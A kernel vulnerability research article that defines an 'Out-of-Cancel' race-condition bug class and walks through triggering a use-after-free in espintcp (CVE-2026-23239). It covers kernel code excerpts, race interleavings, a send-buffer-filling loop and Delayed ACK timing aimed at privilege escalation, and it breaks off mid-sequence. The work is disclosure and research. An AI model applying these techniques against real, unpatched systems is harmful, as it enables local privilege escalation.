Out-of-Cancel: A Vulnerability Class Rooted in Workqueue Cancellation APIs
Introduction
Last year, while exploiting a kernel vulnerability in a specific Linux distribution, I encountered a situation where I needed to intentionally delay the execution of a worker. To deal with this, I looked into the Linux kernel workqueue mechanism and happened to find a relatively new API called disable_work_sync(). This API was introduced not just to cancel work that is currently running, but to prevent the work itself from being queued again later.
With existing work items, the cancel_work_sync() family of APIs could stop a currently running work item, but there was no fundamental way to prevent the same work from being scheduled again through another path (tasklets, by contrast, have long had tasklet_disable() for exactly this purpose). This means that, in a workqueue-based asynchronous execution model, it is hard to safely control an object's lifetime using cancellation alone. The fact that disable_work_sync() was added to cover this gap strongly suggests that there is a subtle design issue or vulnerability related to it somewhere in the kernel.
Based on this idea, I started my analysis in the networking subsystem, specifically TCP and ULP (Upper Layer Protocol). TCP is a very complex state machine on its own, and ULP is designed to hook into its internal operation. Because of this, I had long suspected that the TCP code and its surrounding paths could hide issues beyond simple implementation mistakes, including more fundamental synchronization and lifetime management problems.
As a result of the analysis, I found multiple race condition vulnerabilities that keep showing up in code patterns that rely on synchronous worker cancellation. In this article, I call this class of vulnerabilities Out-of-Cancel bugs. These are bugs that appear when the _cancel APIs are treated as a barrier that guarantees an object’s lifetime, even though the object can still “escape” through other asynchronous paths and get rescheduled.
This article uses the espintcp vulnerability (CVE-2026-23239) as a case study to look at the structure in which this Out-of-Cancel bug class shows up, and to walk through how combining complex kernel interleavings makes the bug actually exploitable. In particular, it shows how different execution mechanisms such as interrupts, Delayed ACK, timers, workqueues, and the scheduler come together into a single race scenario, and based on that, it explains how to build an exploit sequence in practice.
All analysis and code path descriptions in this article are based on the Linux kernel v6.18 source tree, and the test kernel was built from an Ubuntu 25.10 configuration with unnecessary options removed.
Cancellation-Based Synchronization as a Bug Class
In many parts of the kernel, object teardown usually follows a pattern like this. First, the work is cleaned up using the _cancel APIs, and then the object is freed. On the surface, this looks safe, but this pattern carries a structural weakness in that it relies on cancellation to manage the object’s lifetime. The _cancel APIs can clean up work that is currently running or already queued, but they do not fundamentally prevent the same work from being queued again through another path.
Simplified, it can be illustrated as follows:
cpu0                                      cpu1
test_destroy()
  cancel_work_sync(&test->work);
                                          test_something()
                                            schedule_work(&test->work);
  kfree(test);
                                          [ kworker/1 ]
                                          test_work_handler()
                                            test->a = b; // Use-After-Free
test_destroy() frees the object after cancellation, but if schedule_work() is called again on another CPU, the work can be queued again. As a result, an already freed object can be dereferenced. Of course, for this to happen, test_destroy() and test_something() must not be protected by the same lock. This issue is not limited to cancel_work_sync(). The same applies to other cancellation APIs, including cancel_delayed_work_sync().
The important point is that this is not simply a case of a missing lock or a forgotten condition check. The core problem is the design itself, which treats the _cancel APIs as if they were a synchronization barrier for the object’s lifetime. Cancellation can stop or clean up “what is running right now”, but it does not provide a lifetime guarantee in the sense of “this will never run again”.
In the rest of this article, I refer to this class of vulnerability patterns as Out-of-Cancel bugs.
Backstory: The ULP Implementation Model
Out-of-Cancel bugs showed up most often in the ULP layer and the code surrounding it.
ULP is implemented in a way that “intrusively” hooks into the TCP stack. It attaches callbacks at various points in the receive path, send path, error handling, and other callback sites to extend or modify TCP behavior. This design gives a lot of flexibility, but it also tends to blur the boundaries around object ownership, lifetime, and execution context. In particular, ULP processes stream data through shared infrastructure such as strparser, and along the way it naturally ends up interacting with several of the kernel’s asynchronous execution mechanisms, including workqueues, timers, and softirqs.
TCP itself is already a very complex state machine. Connection setup and teardown, congestion control, retransmission, and delayed ACK handling are all intertwined. Once ULP is added on top of this, even a small implementation mistake or an incomplete teardown path can end up interacting with other parts of TCP in unexpected ways.
One of these ULPs is espintcp. espintcp is a ULP module that sits on top of a TCP socket to implement TCP-based ESP transport as defined in RFC 8229. Its implementation follows the usual ULP model. When a ULP is attached to a TCP socket, it registers callbacks at several points in the receive and send paths, and it uses its own workqueues and timers when it needs asynchronous processing. In short, espintcp goes deep into TCP’s execution flow and works by intercepting or extending data processing and state transitions.
Looking at the code, espintcp allocates and initializes a struct espintcp_ctx via a setsockopt("espintcp") call and then attaches it to the socket. During this setup, function pointers such as ->sendmsg, ->recvmsg, ->sk_write_space, and ->sk_data_ready are replaced with espintcp’s own implementations, which lets it hook into TCP’s send and receive paths and its event handling paths. As a result, espintcp arranges for its own logic to run on data processing, buffer state changes, and various asynchronous events during TCP communication.
static struct tcp_ulp_ops espintcp_ulp __read_mostly = {
    .name = "espintcp",
    .owner = THIS_MODULE,
    .init = espintcp_init_sk,
};

static void build_protos(struct proto *espintcp_prot,
                         struct proto_ops *espintcp_ops,
                         const struct proto *orig_prot,
                         const struct proto_ops *orig_ops)
{
    memcpy(espintcp_prot, orig_prot, sizeof(struct proto));
    memcpy(espintcp_ops, orig_ops, sizeof(struct proto_ops));
    espintcp_prot->sendmsg = espintcp_sendmsg;
    espintcp_prot->recvmsg = espintcp_recvmsg;
    espintcp_prot->close = espintcp_close;
    espintcp_prot->release_cb = espintcp_release;
    espintcp_ops->poll = espintcp_poll;
}
static int espintcp_init_sk(struct sock *sk)
{
    struct inet_connection_sock *icsk = inet_csk(sk);
    struct strp_callbacks cb = {
        .rcv_msg = espintcp_rcv,
        .parse_msg = espintcp_parse,
    };
    struct espintcp_ctx *ctx;
    int err;

    /* sockmap is not compatible with espintcp */
    if (sk->sk_user_data)
        return -EBUSY;

    ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
    if (!ctx)
        return -ENOMEM;

    err = strp_init(&ctx->strp, sk, &cb);
    if (err)
        goto free;

    __sk_dst_reset(sk);

    strp_check_rcv(&ctx->strp);
    skb_queue_head_init(&ctx->ike_queue);
    skb_queue_head_init(&ctx->out_queue);

    if (sk->sk_family == AF_INET) {
        sk->sk_prot = &espintcp_prot;
        sk->sk_socket->ops = &espintcp_ops;
    } else {
        mutex_lock(&tcpv6_prot_mutex);
        if (!espintcp6_prot.recvmsg)
            build_protos(&espintcp6_prot, &espintcp6_ops, sk->sk_prot, sk->sk_socket->ops);
        mutex_unlock(&tcpv6_prot_mutex);

        sk->sk_prot = &espintcp6_prot;
        sk->sk_socket->ops = &espintcp6_ops;
    }

    ctx->saved_data_ready = sk->sk_data_ready;
    ctx->saved_write_space = sk->sk_write_space;
    ctx->saved_destruct = sk->sk_destruct;
    sk->sk_data_ready = espintcp_data_ready;
    sk->sk_write_space = espintcp_write_space;
    sk->sk_destruct = espintcp_destruct;
    rcu_assign_pointer(icsk->icsk_ulp_data, ctx);
    INIT_WORK(&ctx->work, espintcp_tx_work);

    /* avoid using task_frag */
    sk->sk_allocation = GFP_ATOMIC;
    sk->sk_use_task_frag = false;

    return 0;

free:
    kfree(ctx);
    return err;
}
For example, when a packet is received on a socket with espintcp enabled, the receive path proceeds in the following order.
[ NET_RX softirq ]
net_rx_action() // Incoming data arrives
  ...
  tcp_v4_rcv()
    tcp_v4_do_rcv()
      tcp_rcv_established()
        tcp_data_queue()
          sk_data_ready(sk) // Notify receive event
            strp_data_ready(sk) // Notify strparser that data is available to read
              queue_work(strp_wq, &strp->work) // Schedule the strp_work() worker

[ kworker ]
strp_work()
  do_strp_work()
    strp_read_sock()
      tcp_read_sock() // sock->ops->read_sock()
        __tcp_read_sock()
          strp_recv()
            espintcp_parse() // (*strp->cb.parse_msg)()
            espintcp_rcv() // strp->cb.rcv_msg()
The goal of this flow is to reconstruct the "byte stream" provided by TCP into "record-based messages" that espintcp can understand. tcp_read_sock() takes skb objects that are already queued in the TCP receive queue one by one and passes them to strp_recv(). strp_recv() accumulates this data and uses strparser to reassemble message boundaries. In this process, espintcp_parse() is responsible for determining the length of the next record at the current position in the stream. In the case of espintcp, it reads the first two bytes as a length field and returns the total length of the record. Once strparser has collected that many bytes, the completed record skb is delivered to espintcp_rcv().
espintcp_rcv() receives this completed record, inspects the message contents, and then distinguishes between ESP traffic and non-ESP (IKE) traffic. Messages identified as non-ESP are queued into ctx->ike_queue via handle_nonesp() so that they can later be read from user space with recvmsg(). Messages identified as ESP are passed to a separate processing path. In other words, this entire call chain forms the receive pipeline in which espintcp reconstructs its own protocol message boundaries on top of the TCP stream and then demultiplexes them by type.
Finally, when the user calls recvmsg(), the previously registered espintcp_recvmsg() is executed and copies messages that were queued into ctx->ike_queue by espintcp_rcv() in the earlier receive path into user space.
Case Study on espintcp - CVE-2026-23239
In this article, among the Out-of-Cancel class of bugs that I discovered and patched during this research, I use the espintcp vulnerability (CVE-2026-23239) as a representative case and explain how it is triggered and how the exploit scenario works.
Notably, unlike most kernel vulnerabilities, CVE-2026-23239 does not require creating a user namespace to trigger.
The core of this espintcp vulnerability is in espintcp_close(). Below is the implementation of espintcp_close() that causes the problem.
static void espintcp_close(struct sock *sk, long timeout)
{
    struct espintcp_ctx *ctx = espintcp_getctx(sk);
    struct espintcp_msg *emsg = &ctx->partial;

    strp_stop(&ctx->strp);

    sk->sk_prot = &tcp_prot;
    barrier();

    cancel_work_sync(&ctx->work); // Not protected by lock_sock()

    strp_done(&ctx->strp);

    skb_queue_purge(&ctx->out_queue);
    skb_queue_purge(&ctx->ike_queue);

    if (emsg->len) {
        if (emsg->skb)
            kfree_skb(emsg->skb);
        else
            sk_msg_free(sk, &emsg->skmsg);
    }

    tcp_close(sk, timeout);
}
The problem is that it uses cancel_work_sync() instead of disable_work_sync(), and that this call is made outside lock_sock(). Because of this, &ctx->work can still be scheduled again even after cancel_work_sync(&ctx->work) returns, and a race can occur between the remaining cleanup steps in the close path and the worker execution. This is the root cause of the vulnerability.
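Given this root cause, the natural fix direction is the API mentioned in the introduction: make the close path disable the work rather than merely cancel it, so that later schedule_work() calls become no-ops. Sketched as a hypothetical one-line diff (the actual upstream patch may differ and may require further changes elsewhere):

```
-    cancel_work_sync(&ctx->work);
+    disable_work_sync(&ctx->work); /* later schedule_work(&ctx->work) calls are ignored */
```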
The function that schedules this &ctx->work is the espintcp_write_space() hook, which replaces ->sk_write_space().
static void espintcp_write_space(struct sock *sk)
{
    struct espintcp_ctx *ctx = espintcp_getctx(sk);

    schedule_work(&ctx->work);
    ctx->saved_write_space(sk);
}
In socket I/O, ->sk_write_space() is a hook that is called when there is free space in the send buffer. It notifies the upper layer that the socket has become writable again and triggers the send path to continue. espintcp_write_space() intercepts this event and reschedules the espintcp worker (ctx->work), causing data queued in its internal buffers to be processed again and transmission to resume.
This espintcp_write_space() is called from the ACK path during TCP data transmission.
[ process context ]
sendmsg(client_sk)
  espintcp_sendmsg()
    espintcp_push_msgs()
      espintcp_sendskmsg_locked()
        tcp_sendmsg_locked()
          tcp_push()
            __tcp_push_pending_frames()
              tcp_write_xmit()
                tcp_transmit_skb()
                  ...
                  raise NET_RX_SOFTIRQ

[ NET_RX softirq context - sending DATA ]
net_rx_action()
  ...
  tcp_v4_rcv()
    sk = __inet_lookup_skb() // sk: server_sk
    tcp_v4_do_rcv(server_sk)
      tcp_rcv_established()
        __tcp_ack_snd_check()
          tcp_send_ack()
            __tcp_send_ack()
              __tcp_transmit_skb()
                ...
                raise NET_RX_SOFTIRQ

[ NET_RX softirq context - ACK ]
net_rx_action()
  ...
  tcp_v4_rcv()
    sk = __inet_lookup_skb() // sk: client_sk
    tcp_v4_do_rcv(client_sk)
      tcp_rcv_established()
        tcp_data_snd_check()
          tcp_check_space()
            espintcp_write_space()
              schedule_work(&ctx->work);
To achieve privilege escalation, this race condition needs to be triggered in a reliable way in a loopback setup. When a user calls sendmsg() on a socket with espintcp enabled, the send path runs, and the corresponding ACK processing comes back almost immediately through the NET_RX path. In this process, the ACK ends up calling sk_write_space(), which in turn triggers schedule_work(&ctx->work) through espintcp_write_space().
The problem is that, unless this ACK-based softirq receive path is delayed by tens of µs, schedule_work(&ctx->work) is in most cases handled while the sendmsg() context is still running. In other words, worker scheduling effectively happens inside the execution flow of sendmsg().
On the other hand, the espintcp_close() that needs to race does not run immediately when the user calls close(). Instead, it is invoked through the socket release path when the reference count (f_count) of the struct file finally drops to zero in the VFS layer. If another thread is still running sendmsg(), that thread still holds a file reference, so the actual socket release does not happen yet, and espintcp_close() is not called either.
long __sys_sendmsg(int fd, struct user_msghdr __user *msg, unsigned int flags,
                   bool forbid_cmsg_compat)
{
    struct msghdr msg_sys;
    struct socket *sock;

    if (forbid_cmsg_compat && (flags & MSG_CMSG_COMPAT))
        return -EINVAL;

    CLASS(fd, f)(fd); // f_count management
    [...]
}
As a result, the point in time when espintcp_sendmsg() is running and the point in time when espintcp_close() runs cannot overlap, and structurally there is no race between the two. In other words, in a loopback setup, simply calling sendmsg() and close() in parallel is not enough to create a race between espintcp_close() and the send path.
To trigger this vulnerability, we need something extra that makes espintcp_close() and espintcp_write_space() actually run at the same time, using an asynchronous execution path that operates independently of the sendmsg() path. There are two approaches to satisfy this condition.
The first approach is to use ksoftirqd to make the NET_RX softirq work that calls espintcp_write_space() race with espintcp_close(). ksoftirqd is a per-CPU kernel thread that is scheduled to handle softirqs when they cannot be processed immediately in interrupt context or when they are deferred. Since it is a kernel thread, it runs in normal process context and can run in parallel with espintcp_close() on another CPU. As a result, when NET_RX softirq processing is pushed into the ksoftirqd context, conditions are created where espintcp_write_space() can actually run at the same time as the close path.
Abstracted, this scenario looks like this:
cpu0                                      cpu1
close()
  inet_release()
    espintcp_close()
      cancel_work_sync(&ctx->work);
                                          [ ksoftirqd/1 ]
                                          net_rx_action()
                                            ...
                                            tcp_v4_rcv()
                                              tcp_v4_do_rcv()
                                                tcp_rcv_established()
                                                  tcp_data_snd_check()
                                                    tcp_check_space()
                                                      espintcp_write_space()
                                                        schedule_work(&ctx->work);
The second approach is to use TCP’s Delayed ACK timer. Delayed ACK is a mechanism where the receiver does not send an ACK immediately, waits for a short time to see if more data arrives, and then sends a single ACK. The goal is to reduce the number of packets.
In the Linux TCP stack, tcp_send_delayed_ack() sets up tcp_delack_timer() through sk_reset_timer() to delay ACK transmission. When the timer expires, tcp_delack_timer() runs and enters the path that sends the pending ACK. Here, sk_reset_timer() is the function that arms a kernel timer attached to the socket, and this timer is handled in softirq context. As a result, tcp_delack_timer() runs in softirq context, and by its nature it can run asynchronously even while espintcp_close() is in progress.
void tcp_send_delayed_ack(struct sock *sk)
{
    struct inet_connection_sock *icsk = inet_csk(sk);
    int ato = icsk->icsk_ack.ato;
    unsigned long timeout;

    [...]

    ato = min_t(u32, ato, tcp_delack_max(sk));

    /* Stay within the limit we were given */
    timeout = jiffies + ato;

    /* Use new timeout only if there wasn't a older one earlier. */
    if (icsk->icsk_ack.pending & ICSK_ACK_TIMER) {
        /* If delack timer is about to expire, send ACK now. */
        if (time_before_eq(icsk_delack_timeout(icsk), jiffies + (ato >> 2))) {
            tcp_send_ack(sk);
            return;
        }

        if (!time_before(timeout, icsk_delack_timeout(icsk)))
            timeout = icsk_delack_timeout(icsk);
    }
    smp_store_release(&icsk->icsk_ack.pending,
                      icsk->icsk_ack.pending | ICSK_ACK_SCHED | ICSK_ACK_TIMER);
    sk_reset_timer(sk, &icsk->icsk_delack_timer, timeout); // tcp_delack_timer()
}
Abstracted, this scenario looks like this:
cpu0

[ process context ]
sendmsg()
  ...
  raise NET_RX_SOFTIRQ

[ NET_RX softirq context - sending DATA ]
net_rx_action()
  ...
  __tcp_ack_snd_check()
    tcp_send_delayed_ack()
      sk_reset_timer(&icsk->icsk_delack_timer)

[ process context ]
close()
  inet_release()
    espintcp_close()
      cancel_work_sync(&ctx->work);

[ timer softirq context - Delayed ACK ]
tcp_delack_timer()
  tcp_delack_timer_handler()
    tcp_send_ack()
      ...
      raise NET_RX_SOFTIRQ

[ NET_RX softirq context - ACK ]
net_rx_action()
  ...
  tcp_data_snd_check()
    tcp_check_space()
      espintcp_write_space()
        schedule_work(&ctx->work);
Because the tcp_delack_timer() handler is scheduled with an explicit delay through sk_reset_timer(), its execution time is relatively predictable and easier to control. This path also does not rely on a parallel thread. Instead, it runs in softirq context and can interrupt the execution of espintcp_close(). That makes it possible to stop the close path right after the cancel_work_sync(&ctx->work) call. For these reasons, using Delayed ACK is more favorable for controlling the race timing, and this article uses this approach.
The espintcp Race, Step by Step
This race scenario relies on a complex interaction where the TCP send path, receive path, workqueue processing, socket teardown, and interrupt-driven asynchronous paths are all active at the same time. Each step runs in a different context (process, interrupt, worker), and the outcome can vary significantly depending on timing. For that reason, the conditions and progression of the race scenario are broken down into multiple stages and analyzed step by step.
Arming the Socket State
->sk_write_space() is a hook that is called when free space becomes available in the send buffer again. For this hook to be called, the socket must have been blocked at least once in the past due to lack of send buffer space. In the kernel, this state is tracked with the SOCK_NOSPACE flag.
In the ACK softirq path, tcp_check_space() is called to check whether there is free space in the send buffer. Looking at its implementation, it becomes clear that ->sk_write_space() is only invoked when the target socket has the SOCK_NOSPACE flag set.
static void tcp_new_space(struct sock *sk)
{
    struct tcp_sock *tp = tcp_sk(sk);

    if (tcp_should_expand_sndbuf(sk)) {
        tcp_sndbuf_expand(sk);
        tp->snd_cwnd_stamp = tcp_jiffies32;
    }

    INDIRECT_CALL_1(sk->sk_write_space, sk_stream_write_space, sk); // espintcp_write_space()
}

void tcp_check_space(struct sock *sk)
{
    /* pairs with tcp_poll() */
    smp_mb();
    if (sk->sk_socket &&
        test_bit(SOCK_NOSPACE, &sk->sk_socket->flags)) {
        tcp_new_space(sk);
        if (!test_bit(SOCK_NOSPACE, &sk->sk_socket->flags))
            tcp_chrono_stop(sk, TCP_CHRONO_SNDBUF_LIMITED);
    }
}
In other words, to start the race scenario, the first step is to put the target TCP socket into a state where the SOCK_NOSPACE flag is set. This SOCK_NOSPACE flag is set inside tcp_sendmsg_locked(), which is called from the sendmsg() path, when the condition of insufficient send buffer space is met.
The sequence that leads to the SOCK_NOSPACE flag being set is as follows.
- As the client socket keeps calling sendmsg() repeatedly, the server socket's sk->sk_receive_queue gradually fills up. At some point, the tcp_hdr(skb)->window value in the ACK skb sent by the server socket is set to 0 (Zero Window). This means that the server socket no longer has free space to receive more data.

- Once the Zero Window state is reached, the ACK handling path, tcp_ack() → tcp_ack_update_window() → tcp_snd_una_update(), enters a situation where the advancement of tp->snd_una easily stalls [1]. This happens because the server side can no longer accept more data, which makes it difficult for new data to be delivered from the client side, and as a result the same ACK number keeps arriving. In this case, the ACK value passed to tcp_snd_una_update() is the same as before, so tp->snd_una does not move forward either.

static void tcp_snd_una_update(struct tcp_sock *tp, u32 ack)
{
    u32 delta = ack - tp->snd_una;

    sock_owned_by_me((struct sock *)tp);
    tp->bytes_acked += delta;
    tcp_snd_sne_update(tp, ack);
    tp->snd_una = ack; // <=[1]
}

static int tcp_ack_update_window(struct sock *sk, const struct sk_buff *skb, u32 ack,
                                 u32 ack_seq)
{
    struct tcp_sock *tp = tcp_sk(sk);
    int flag = 0;
    u32 nwin = ntohs(tcp_hdr(skb)->window);

    if (likely(!tcp_hdr(skb)->syn))
        nwin <<= tp->rx_opt.snd_wscale;

    if (tcp_may_update_window(tp, ack, ack_seq, nwin)) {
        flag |= FLAG_WIN_UPDATE;
        tcp_update_wl(tp, ack_seq);

        if (tp->snd_wnd != nwin) {
            tp->snd_wnd = nwin;

            /* Note, it is the only place, where
             * fast path is recovered for sending TCP.
             */
            tp->pred_flags = 0;
            tcp_fast_path_check(sk);

            if (!tcp_write_queue_empty(sk))
                tcp_slow_start_after_idle_check(sk);

            if (nwin > tp->max_window) {
                tp->max_window = nwin;
                tcp_sync_mss(sk, inet_csk(sk)->icsk_pmtu_cookie);
            }
        }
    }

    tcp_snd_una_update(tp, ack);

    return flag;
}

- As a result, in the final stage of ACK processing, tcp_ack() → tcp_clean_rtx_queue(), the skb objects in the client side sk->tcp_rtx_queue are considered not fully acked [2] and are left in place instead of being removed [3]. Because of this, memory accounting for sk->tcp_rtx_queue is not released. In the end, sk->sk_wmem_queued no longer goes down, and if sending continues, it actually starts to grow.

static int tcp_clean_rtx_queue(struct sock *sk, const struct sk_buff *ack_skb,
                               u32 prior_fack, u32 prior_snd_una,
                               struct tcp_sacktag_state *sack, bool ece_ack)
{
    const struct inet_connection_sock *icsk = inet_csk(sk);
    u64 first_ackt, last_ackt;
    struct tcp_sock *tp = tcp_sk(sk);
    u32 prior_sacked = tp->sacked_out;
    u32 reord = tp->snd_nxt; /* lowest acked un-retx un-sacked seq */
    struct sk_buff *skb, *next;
    bool fully_acked = true;
    long sack_rtt_us = -1L;
    long seq_rtt_us = -1L;
    long ca_rtt_us = -1L;
    u32 pkts_acked = 0;
    bool rtt_update;
    int flag = 0;

    first_ackt = 0;

    for (skb = skb_rb_first(&sk->tcp_rtx_queue); skb; skb = next) {
        struct tcp_skb_cb *scb = TCP_SKB_CB(skb);
        const u32 start_seq = scb->seq;
        u8 sacked = scb->sacked;
        u32 acked_pcount;

        /* Determine how many packets and what bytes were acked, tso and else */
        if (after(scb->end_seq, tp->snd_una)) { // <=[2]
            if (tcp_skb_pcount(skb) == 1 ||
                !after(tp->snd_una, scb->seq))
                break; // <=[3]

            acked_pcount = tcp_tso_acked(sk, skb);
            if (!acked_pcount)
                break;
            fully_acked = false;
        } else {
            acked_pcount = tcp_skb_pcount(skb);
        }
    [...]
}

- As sendmsg() keeps being called, the skb->len accumulated into a single skb inside tcp_sendmsg_locked() keeps increasing and eventually reaches size_goal. At that point, there is no space left to copy, so copy becomes 0 [4], and as a result the code path enters the new_segment: label [5].

static inline bool __sk_stream_memory_free(const struct sock *sk, int wake)
{
    if (READ_ONCE(sk->sk_wmem_queued) >= READ_ONCE(sk->sk_sndbuf))
        return false;

    return sk->sk_prot->stream_memory_free ?
        INDIRECT_CALL_INET_1(sk->sk_prot->stream_memory_free,
                             tcp_stream_memory_free, sk, wake) : true;
}

static inline bool sk_stream_memory_free(const struct sock *sk)
{
    return __sk_stream_memory_free(sk, 0);
}

int tcp_sendmsg_locked(struct sock *sk, struct msghdr *msg, size_t size)
{
    [...]
restart:
    mss_now = tcp_send_mss(sk, &size_goal, flags);

    err = -EPIPE;
    if (sk->sk_err || (sk->sk_shutdown & SEND_SHUTDOWN))
        goto do_error;

    while (msg_data_left(msg)) {
        int copy = 0;

        skb = tcp_write_queue_tail(sk);
        if (skb)
            copy = size_goal - skb->len; // <=[4]

        trace_tcp_sendmsg_locked(sk, msg, skb, size_goal);

        if (copy <= 0 || !tcp_skb_can_collapse_to(skb)) { // <=[5]
            bool first_skb;

new_segment:
            if (!sk_stream_memory_free(sk)) // <=[6]
                goto wait_for_space;
    [...]
wait_for_space:
        set_bit(SOCK_NOSPACE, &sk->sk_socket->flags); // <=[7]
        tcp_remove_empty_skb(sk);
        if (copied)
            tcp_push(sk, flags & ~MSG_MORE, mss_now,
                     TCP_NAGLE_PUSH, size_goal);
    [...]
}

- Because sk->sk_wmem_queued has kept increasing, it ends up being much larger than sk->sk_sndbuf, and the code moves to the wait_for_space: label [6]. After that, the SOCK_NOSPACE flag is finally set [7].
A straightforward way for an unprivileged user to trigger this sequence is to pass a small send buffer size hint to the target socket with setsockopt(SO_SNDBUF) and then keep calling send() in a loop. For example, if the send buffer size is constrained to a small value and send() is repeated enough times as shown below, the conditions described above are reached relatively easily.
char buf[1024];
int sndbuf = 1024;

if (setsockopt(fd, SOL_SOCKET, SO_SNDBUF, &sndbuf, sizeof(sndbuf)) < 0)
    perror("setsockopt(SO_SNDBUF)");

memset(buf, 'A', sizeof(buf));
for (int i = 0; i < SENDMSG_COUNT; i++) {
    ssize_t n = send(fd, buf, sizeof(buf), 0);
}
Delaying Execution with a Bound Workqueue
There is one more point to consider. To actually trigger a UAF, the free of the target object must happen before the espintcp worker performs the UAF write. If the espintcp worker runs immediately right after schedule_work(&ctx->work), the victim object has not been freed yet, so a UAF does not occur. In other words, the execution of the worker needs to be delayed on purpose so that the object is freed first.
The key point here is that the espintcp worker is scheduled through schedule_work(). This API uses the global workqueue system_percpu_wq, which is a per-CPU workqueue handled by kworker threads bound to each CPU[8].
static void __queue_work(int cpu, struct workqueue_struct *wq,
                         struct work_struct *work)
{
    [...]
    /* pwq which will be used unless @work is executing elsewhere */
    if (req_cpu == WORK_CPU_UNBOUND) {
        if (wq->flags & WQ_UNBOUND)
            cpu = wq_select_unbound_cpu(raw_smp_processor_id());
        else
            cpu = raw_smp_processor_id(); // <=[8]
    }
    [...]
}

static inline bool schedule_work(struct work_struct *work)
{
    return queue_work(system_percpu_wq, work);
}
Because of this, the espintcp worker cannot run on a CPU other than the current one. It can only be processed after the currently running task finishes and yields the CPU, meaning that even if schedule_work(&ctx->work) is called, the worker will run only after espintcp_close() returns.
In addition, the kernel used in the current test setup is built from the Ubuntu 25.10 configuration with CONFIG_PREEMPT=n, so there is no forced preemption while kernel code is running. This further reduces the chance that the worker can interrupt the execution of espintcp_close(). As a result, the execution of the worker naturally gets pushed to a point after the close path.
In the current race scenario, schedule_work(&ctx->work) is triggered in the middle of espintcp_close() by the Delayed ACK timer, as shown below.
cpu0

[ process context ]
close()
  inet_release()
    espintcp_close()
      cancel_work_sync(&ctx->work);

[ timer softirq context - Delayed ACK ]
tcp_delack_timer()
  tcp_delack_timer_handler()
    tcp_send_ack()
      ...
      raise NET_RX_SOFTIRQ

[ NET_RX softirq context - ACK ]
net_rx_action()
  ...
  tcp_data_snd_check()
    tcp_check_space()
      espintcp_write_space()
        schedule_work(&ctx->work);
For this step, the key point is to have the target object for the UAF freed inside espintcp_close(). The socket teardown in the espintcp_close() path should free the object first, and the worker should run only after that.
After that, even if espintcp_close() is delayed by its own implementation details or by various interleavings, the espintcp worker will not run until espintcp_close() finishes, as long as it does not call schedule() and yield the CPU in the middle.
The Delayed ACK Interleaving
Now it is time to arm the Delayed ACK timer that will schedule the espintcp worker.
Delayed ACK behavior is mainly controlled by the icsk->icsk_ack.quick field in struct inet_connection_sock. This value represents how many immediate ACKs are still allowed. Once this counter reaches zero, incoming packets no longer trigger an immediate ACK, and the code path switches to setting the Delayed ACK timer instead.
static bool tcp_in_quickack_mode(struct sock *sk)
{
    const struct inet_connection_sock *icsk = inet_csk(sk);

    return icsk->icsk_ack.dst_quick_ack ||
           (icsk->icsk_ack.quick && !inet_csk_in_pingpong_mode(sk));
}

static void __tcp_ack_snd_check(struct sock *sk, int ofo_possible)
{
    struct tcp_sock *tp = tcp_sk(sk);
    unsigned long rtt, delay;

    /* More than one full frame received... */
    if (((tp->rcv_nxt - tp->rcv_wup) > inet_csk(sk)->icsk_ack.rcv_mss &&
         /* ... and right edge of window advances far enough.
          * (tcp_recvmsg() will send ACK otherwise).
          * If application uses SO_RCVLOWAT, we want send ack now if
          * we have not received enough bytes to satisfy the condition.
          */
         (tp->rcv_nxt - tp->copied_seq < sk->sk_rcvlowat ||
          __tcp_select_window(sk) >= tp->rcv_wnd)) ||
        /* We ACK each frame or... */
        tcp_in_quickack_mode(sk) || // Check icsk->icsk_ack.quick
        /* Protocol state mandates a one-time immediate ACK */
        inet_csk(sk)->icsk_ack.pending & ICSK_ACK_NOW) {
        /* If we are running from __release_sock() in user context,
         * Defer the ack until tcp_release_cb().
         */
        if (sock_owned_by_user_nocheck(sk) &&
            READ_ONCE(sock_net(sk)->ipv4.sysctl_tcp_backlog_ack_defer)) {
            set_bit(TCP_ACK_DEFERRED, &sk->sk_tsq_flags);
            return;
        }
send_now:
        tcp_send_ack(sk); // ACK
        return;
    }

    if (!ofo_possible || RB_EMPTY_ROOT(&tp->out_of_order_queue)) {
        tcp_send_delayed_ack(sk); // Delayed ACK
        return;
    }
    [...]
}
icsk->icsk_ack.quick is initialized on the server side in the NET_RX path when data is received for the first time. Looking at the implementation of tcp_event_data_recv(), which is called from the NET_RX path, this value is set to the maximum TCP_MAX_QUICKACKS when the first packet is received.
/* Maximal number of ACKs sent quickly to accelerate slow-start. */
#define TCP_MAX_QUICKACKS 16U

static void tcp_event_data_recv(struct sock *sk, struct sk_buff *skb)
{
    struct tcp_sock *tp = tcp_sk(sk);
    struct inet_connection_sock *icsk = inet_csk(sk);
    u32 now;

    [...]

    if (!icsk->icsk_ack.ato) {
        /* The _first_ data packet received, initialize
         * delayed ACK engine.
         */
        tcp_incr_quickack(sk, TCP_MAX_QUICKACKS);
        icsk->icsk_ack.ato = TCP_ATO_MIN;
    [...]
}
After that, icsk->icsk_ack.quick is decremented each time an ACK is sent. Once it reaches zero, the code switches to the Delayed ACK path and arms the tcp_delack_timer() handler.
/* Account for an ACK we sent. */
static inline void tcp_event_ack_sent(struct sock *sk, u32 rcv_nxt)
{
struct tcp_sock *tp = tcp_sk(sk);
[...]
tcp_dec_quickack_mode(sk);
inet_csk_clear_xmit_timer(sk, ICSK_TIME_DACK);
}
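The budget mechanics described above can be sketched with a small user-space model. This is only an illustration of the counter behavior (the toy_* names are invented here); the real tcp_incr_quickack() also caps the budget by the receive window and MSS.

```c
#include <assert.h>

/* Toy model of the quick-ACK budget: filled to TCP_MAX_QUICKACKS on the
 * first data packet, spent one per ACK; once it hits zero, ACKs fall
 * through to the delayed path. A sketch only, not the kernel logic. */
#define TOY_TCP_MAX_QUICKACKS 16U

struct toy_icsk_ack { unsigned int quick; };

/* models the first-packet initialization in tcp_event_data_recv() */
static void toy_first_data_recv(struct toy_icsk_ack *ack)
{
    ack->quick = TOY_TCP_MAX_QUICKACKS;
}

/* models tcp_in_quickack_mode() + tcp_dec_quickack_mode(): returns 1 if
 * this ACK goes out immediately, 0 if it takes the delayed-ACK path */
static int toy_ack_immediately(struct toy_icsk_ack *ack)
{
    if (ack->quick) {
        ack->quick--;
        return 1;
    }
    return 0;
}
```

With this model, the first 16 ACKs are immediate and every ACK after that is delayed, which is exactly the property the race scenario relies on to get tcp_delack_timer() armed.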
At this point, all that is needed is for the Delayed ACK timer to fire after the cancel_work_sync(&ctx->work) call inside espintcp_close(). The espintcp_close() implementation calls tcp_close() to perform TCP stack cleanup, and that function runs its work under lock_sock().
